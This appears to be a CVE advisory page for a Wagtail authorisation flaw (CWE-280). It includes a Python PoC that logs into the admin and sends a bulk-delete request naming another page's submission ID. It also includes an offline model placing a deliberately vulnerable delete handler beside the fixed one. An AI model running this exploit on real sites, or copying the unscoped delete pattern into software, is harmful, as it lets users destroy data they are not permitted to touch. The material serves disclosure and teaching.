Security Vulnerability Report
CVE-2026-44199 CVSS 6.5 MEDIUM

Published: 2026-05-11 16:17:35
Last Modified: 2026-05-12 15:58:28

Description

Wagtail is an open source content management system built on Django. Prior to 7.0.7, 7.3.2, and 7.4, a CMS user with limited access to form pages could delete submissions belonging to form pages they do not have access to: the bulk-delete request is issued against a form page the user can access, but the submission IDs it carries are only checked by ID, not against the page they belong to, so IDs from other form pages are deleted as well. The vulnerability is not exploitable by an ordinary site visitor without access to the Wagtail admin. This vulnerability is fixed in 7.0.7, 7.3.2, and 7.4.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:* (versions < 7.0.7) - VULNERABLE
cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:* (versions >= 7.1.0, < 7.3.2) - VULNERABLE

Per the advisory text, 7.4 is the first release of its series with the fix; the NVD configuration data lists only the two version ranges above.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Configuration. The endpoint path and the POST field names below are the
# placeholders used by the original PoC; confirm them against the admin routes
# of the Wagtail version under test before relying on the result.
target_url = "http://example.com"
login_url = f"{target_url}/admin/login/"
accessible_page_id = 1  # a form page the limited user is allowed to manage
delete_endpoint = f"{target_url}/admin/pages/{accessible_page_id}/submissions/delete/"
username = "limited_user"
password = "user_password"
# The ID of the submission to delete (belonging to a form page the user cannot access)
target_submission_id = 999

session = requests.Session()

# 1. Authenticate. Django issues the CSRF token as the "csrftoken" cookie on the
#    first GET, and the login form must echo it back in csrfmiddlewaretoken.
session.get(login_url)
login_data = {
    "username": username,
    "password": password,
    "csrfmiddlewaretoken": session.cookies.get("csrftoken", ""),
    "next": "/admin/",
}
session.post(login_url, data=login_data, headers={"Referer": login_url})

# 2. Craft the exploit payload: a delete request scoped to a page the user CAN
#    access, naming a submission ID from a page the user CANNOT access.
payload = {
    "action": "delete",
    "selected_submission": target_submission_id,
    "csrfmiddlewaretoken": session.cookies.get("csrftoken", ""),
}

# 3. Send the exploit request. A Django admin view normally redirects (302)
#    back to the listing after a successful POST, so treat that as success too.
response = session.post(
    delete_endpoint,
    data=payload,
    headers={"Referer": delete_endpoint},
    allow_redirects=False,
)
if response.status_code in (200, 302):
    print(f"[+] Request accepted; verify submission ID {target_submission_id} is gone")
else:
    print(f"[-] Exploit failed. Status: {response.status_code}")
```
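The description and the PoC above show the request side of the bug; the server-side pattern behind it (CWE-280) is a bulk action that authorises the page named in the URL and then deletes by submission ID alone. The example below is added here and is not Wagtail's code: it models that handler in plain Python with a constructed in-memory store standing in for the ORM, and puts the vulnerable delete beside the fixed one, which scopes the delete to the page that was actually authorised (in Django ORM terms, the difference between `filter(id__in=ids)` and `filter(id__in=ids, page=page)`). The permission map, page IDs and submission IDs are assumptions for illustration.

```python
"""Added example, not from the Wagtail project: the authorisation pattern behind
CVE-2026-44199, modelled offline with plain Python objects.

Assumptions (constructed for illustration): a set of page ids the user may
manage, a bulk-delete request carrying a page id in the URL and a list of
submission ids in the body, and an in-memory store in place of the ORM.
"""
from dataclasses import dataclass, field
from typing import Callable, Dict, Iterable, List, Set, Tuple


@dataclass(frozen=True)
class Submission:
    id: int
    page_id: int


@dataclass
class Store:
    """In-memory stand-in for a FormSubmission table (constructed sample data)."""
    submissions: Dict[int, Submission] = field(default_factory=dict)

    def delete_where(self, predicate: Callable[[Submission], bool]) -> List[int]:
        """Delete every submission matching predicate; return the deleted ids."""
        doomed = [s.id for s in self.submissions.values() if predicate(s)]
        for sid in doomed:
            del self.submissions[sid]
        return doomed


class PermissionDenied(Exception):
    pass


def check_page_permission(user_pages: Set[int], page_id: int) -> None:
    """The check an admin view performs on the page named in the URL."""
    if page_id not in user_pages:
        raise PermissionDenied(f"no access to page {page_id}")


def delete_submissions_vulnerable(store: Store, user_pages: Set[int],
                                  url_page_id: int, selected_ids: Iterable[int]) -> List[int]:
    """Authorises the URL page, then deletes by id alone: the flaw described.

    Any id the caller can guess is deleted, whichever page it belongs to.
    """
    check_page_permission(user_pages, url_page_id)
    ids = set(selected_ids)
    return store.delete_where(lambda s: s.id in ids)


def delete_submissions_fixed(store: Store, user_pages: Set[int],
                             url_page_id: int, selected_ids: Iterable[int]) -> List[int]:
    """Same authorisation, but the delete is scoped to the authorised page.

    Ids from other pages are silently ignored rather than deleted.
    """
    check_page_permission(user_pages, url_page_id)
    ids = set(selected_ids)
    return store.delete_where(lambda s: s.id in ids and s.page_id == url_page_id)


def sample_store() -> Store:
    # Constructed data: page 10 is accessible to the limited user, page 20 is not.
    return Store({
        1: Submission(1, 10),
        2: Submission(2, 10),
        999: Submission(999, 20),
    })


def run_attack(handler) -> Tuple[List[int], List[int]]:
    """Limited user (page 10 only) deletes via page 10, naming id 999 from page 20.

    Returns (ids deleted, ids still present) so both handlers can be compared.
    """
    store = sample_store()
    deleted = handler(store, {10}, 10, {2, 999})
    return sorted(deleted), sorted(store.submissions)


def is_denied(handler, user_pages: Set[int], url_page_id: int, selected_ids: Iterable[int]) -> bool:
    """True if the handler refuses the request outright (URL page not permitted)."""
    try:
        handler(sample_store(), user_pages, url_page_id, selected_ids)
    except PermissionDenied:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable:", run_attack(delete_submissions_vulnerable))
    print("fixed:     ", run_attack(delete_submissions_fixed))
```

Both handlers refuse a request whose URL names a page the user cannot manage; the difference is only visible when the URL page is permitted and the body smuggles in foreign ids, which is exactly the case the advisory describes.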

References

https://github.com/wagtail/wagtail/security/advisories/GHSA-pwm3-7fv4-g6xx (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44199", "sourceIdentifier": "[email protected]", "published": "2026-05-11T16:17:35.430", "lastModified": "2026-05-12T15:58:28.273", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wagtail is an open source content management system built on Django. Prior to 7.0.7, 7.3.2, and 7.4, a CMS user with limited access to form pages could delete submissions to form pages they don't have access to by crafting a form submission to delete submissions on a page they do have access to for submissions they don't. The vulnerability is not exploitable by an ordinary site visitor without access to the Wagtail admin. This vulnerability is fixed in 7.0.7, 7.3.2, and 7.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-280"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.0.7", "matchCriteriaId": "AA54A323-7F77-4D1D-9830-BF8FBE4B5B34"}, {"vulnerable": true, "criteria": "cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.1", "versionEndExcluding": "7.3.2", "matchCriteriaId": "FED1A6D7-1193-485D-B25F-60FCC20A6D6B"}]}]}], "references": [{"url": "https://github.com/wagtail/wagtail/security/advisories/GHSA-pwm3-7fv4-g6xx", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}